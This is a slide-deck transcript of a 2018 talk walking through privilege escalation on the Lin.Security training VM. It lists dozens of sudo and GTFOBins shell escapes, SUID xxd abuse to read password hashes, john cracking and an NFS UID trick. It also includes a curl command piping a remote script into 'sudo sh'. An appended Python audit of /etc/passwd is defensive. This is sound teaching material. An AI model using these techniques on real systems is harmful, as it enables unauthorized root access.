Linux Privilege Escalation with Lin Security.

These slides cover 30-40 different ways to do privilege escalation and become root. They were presented at Null Bhopal. Details at this link: https://null.co.in/events/491-bhopal-null-bhopal-meet-16-september-2018-monthly-meet

  1. Linux Privilege Escalation with Lin Security - Deepanshu
  2. whoami ● Null Bhopal Chapter Lead ● Google Summer of Code at Debian ● NullCon 2018 volunteer ● Student, UIT RGPV ● Open source contributor ● Footballer
  3. What do we know about Lin Security ● Boot-to-root type ● Specifically for Linux privilege escalation ● Difficulty level - easy to intermediate ● Virtual machine is based on Ubuntu 18.04 ● One of the users' name and password is bob / secret
  4. Let's start with checking SSH ● We can use telnet for this ● If it prints the SSH version then SSH is running on the box
  5. Let's do a full port scan as well
  6. We are in
  7. Let's explore directories. Finding: there are directories present for 3 other users: bob, susan, peter
  8. This looks like something important
  9. Could be susan's password. Let's try it. Yes, it was susan's password indeed. Let's exit out and explore more with the bob user.
  10. There is some hint in the screenshot provided.
  11. With sudo -l we can see ways for privilege escalation: https://gtfobins.github.io/
  12. Some of the easy ways are: ● sudo -i ● sudo ash ● sudo bash ● sudo sh ● sudo csh ● sudo dash ● sudo env /bin/sh ● sudo zsh ● sudo tclsh ● sudo expect -i
  13. Medium level ways: ● sudo perl ● exec "/bin/bash"; ● ctrl+d ● sudo ftp ● !/bin/bash ● sudo man id ● !sh
  14. ● sudo more /etc/passwd ● !sh ● sudo vi ● :bash ● sudo vi -c '!sh'
  15. ● sudo awk 'BEGIN {system("id")}' ● sudo find /dev/null -exec sh \; ● We exploit curl by running scripts as root: curl -sf -L https://raw.githubusercontent.com/d78ui98/Scripts/master/id.sh | sudo sh
  16. One question: are there only 3 users? bob, susan, peter
  17. We can see /etc/passwd for that
  18. Screenshot: /etc/passwd
  19. ● Using /etc/passwd we found the user insecurity. ● It is a root user as it has UID 0. ● We can easily crack its password with some cracking tool such as john. ● And log in as the insecurity user with root privileges
  20. Let's get back to user susan ● We already know its password is MySuperS3cretValue!
  21. We are in!
  22. ● Susan has rbash ○ Reason 1: we cannot change directory ○ Reason 2: we cannot change PATH ● That's why we have really limited functionality ● I first thought of getting a normal shell ● We can do it with: less .bashrc :!sh Or simply by bash
  23. Just some of the methods that I tried to get a normal shell
  24. Another approach with user susan ● I noticed that user susan is in group itservices ● We can check the files that are in the same group
  25. There was a lot of output but one particular result caught my attention
  26. xxd allows us to make a hexdump or do the reverse. This is even more interesting:
  27. ● The owner of /usr/bin/xxd is root ● SUID allows the binary to run with the privileges of its owner ● Since the file's group is itservices ● And susan is also in the group itservices ● We can execute commands as the root user
  28. Next thing we need to do is find a way to get sensitive information from xxd
  29. After trying and failing with the options from man xxd I came up with this:
  30. xxd can also be used to view logs
  31. We have the hash of root and all other users. We can use john to crack the passwords
  32. Cracking passwords with john ● Copy the shadow and passwd files ● Unshadow them. Crack it.
  33. For some reason john was unable to crack peter's password. Let's refer to the findings of nmap again
  34. Looks like some RPC service is running
  35. We can mount peter's home directory to a local directory
  36. Mounting to a local directory
  37. Notice that the user ID of the contents in peter's home directory is 1001. We need to make a dummy user with the same UID to edit its contents. Ubuntu users:
  38. Setting correct permissions
  39. We are in!!
  40. Exploiting docker
  41. Let's see what we are allowed to run with sudo
  42. Again we can make use of GTFOBins here
  43. That would be almost the end of the session..
  44. Thank you!!
  45. Questions?
  46. Resources ● https://in.security/lin-security-practise-your-linux-privilege-escalation-foo/ ● https://payatu.com/guide-linux-privilege-escalation/ ● https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ ● https://in.security/lin-security-walkthrough/
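The finding on slide 19, a second UID-0 account whose password hash sits in the world-readable /etc/passwd instead of /etc/shadow, is something an administrator can check for mechanically. The audit below is an added example, not part of the slides or the Lin.Security VM; the passwd content it parses is constructed sample data and the hash value is a placeholder.

```python
from dataclasses import dataclass

# Constructed sample /etc/passwd (not taken from the VM). The "insecurity" line
# mirrors slide 19: a second UID-0 account with its hash in passwd, not shadow.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bob:x:1000:1000:bob:/home/bob:/bin/bash
peter:x:1001:1001:peter:/home/peter:/bin/bash
susan:x:1002:1002:susan:/home/susan:/bin/rbash
insecurity:$6$saltsalt$PLACEHOLDERHASH:0:0::/:/bin/sh
"""


@dataclass
class Finding:
    user: str
    reason: str


def audit_passwd(text: str) -> list:
    """Return one Finding per passwd entry a defender should look at:
    extra UID-0 accounts, empty password fields, and hashes kept in passwd."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append(Finding(line, f"line {lineno}: malformed entry"))
            continue
        name, pw, uid, _gid, _gecos, _home, _shell = fields
        # Any UID-0 account other than root is a full-privilege login.
        if uid == "0" and name != "root":
            findings.append(Finding(name, "extra UID-0 account"))
        # "x" means the hash lives in /etc/shadow; "*" or "!..." locks the account.
        if pw == "":
            findings.append(Finding(name, "empty password field"))
        elif pw != "x" and not pw.startswith(("*", "!")):
            findings.append(Finding(name, "hash stored in world-readable passwd"))
    return findings


if __name__ == "__main__":
    for f in audit_passwd(SAMPLE_PASSWD):
        print(f"{f.user}: {f.reason}")
```

Run against the real file with `audit_passwd(open("/etc/passwd").read())`; an empty list is the expected result on a healthy host.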
